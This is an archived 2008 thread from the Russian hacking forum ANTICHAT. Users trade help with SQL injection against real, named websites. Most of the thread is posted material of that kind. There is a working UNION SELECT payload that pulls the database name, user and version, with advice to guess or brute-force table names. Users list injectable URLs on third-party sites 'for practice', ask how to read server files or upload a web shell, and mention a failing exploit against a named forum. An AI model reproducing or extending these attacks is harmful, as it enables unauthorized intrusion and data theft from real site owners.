ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
24.06.2008, 01:27
|
|
Banned
Регистрация: 23.06.2008
Сообщений: 0
Провел на форуме:
18145
Репутация:
1
|
|
kak uznac v ineqciu nazivaetsa user ili password ?
|
|
|
24.06.2008, 11:03
|
|
Познающий
Регистрация: 19.01.2008
Сообщений: 80
Провел на форуме:
192736
Репутация:
21
|
|
помогите пожалуйста с xboxland.net/forum
версия форума IPB 2.0.0.
эксплойд не проходит..или я где то делаю ошибку  |
|
|
|
25.06.2008, 20:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Есть один сайт назавем его "test.ru" там есть SQL инъекция по карйне мере должна но вот проблема при вставке
http://test.ru/print_view.php?id=1'&man_id=15&order_by=price
пишет
"Invalid query!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and Manufacturer.ManufacturerID=15 Group by Product.ProductID Order by OurPri' at line 1"
пробывал подставлять "1=1--" без кавычек выдает
"Invalid query!
Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause"
сообственно просьба помочь ^_^ что надо подставить для просмотра файлов на серве или хотябы заливка шела
Зы
Сори но в sql я почти нечего не понимаю 
Чтение статей на секюритилаб результатов недал
Последний раз редактировалось Ks4sK; 25.06.2008 в 20:17..
|
|
|
|
29.06.2008, 00:12
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Сообщение от nicusor
http://www.moldagrotehnica.md/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,database( ),user(),version()),0x71),0x71),6,7/*
что можно сделать дальше ?
там одна колонка
http://www.moldagrotehnica.md/index.php?newsid=-1+union+select+1/*
дальше подбираешь название таблиц и столбцов
|
|
|
|
29.06.2008, 17:39
|
|
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659
Репутация:
34
|
|
если база 4 версия, как вы находите имена таблицы?
|
|
|
|
29.06.2008, 17:46
|
Регистрация: 18.02.2006
Сообщений: 1,090
Провел на форуме:
6489333
Репутация:
1564
|
|
Сообщение от 1SeTh
если база 4 версия, как вы находите имена таблицы?
брутом
для этого есть специальные утилиты на форуме. пользуйся поиском.
|
|
|
|
29.06.2008, 18:28
|
|
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659
Репутация:
34
|
|
знаю я про эти спец утилиты, че то они не катять
|
|
|
|
01.07.2008, 20:23
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
Подкиньте скулю, я попрактикуюсь
|
|
|
|
01.07.2008, 21:25
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
http://www.oke.ru/xo4u.php?id=-42708
http://www.globaleconomicgovernance.org/research.php?id=-2
|
|
|
|
06.07.2008, 22:57
|
|
Познающий
Регистрация: 19.01.2008
Сообщений: 80
Провел на форуме:
192736
Репутация:
21
|
|
помогите пожалуйста с xboxland.net/forum
версия форума IPB 2.0.0.
эксплойд не проходит..или я где то делаю ошибку :\
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
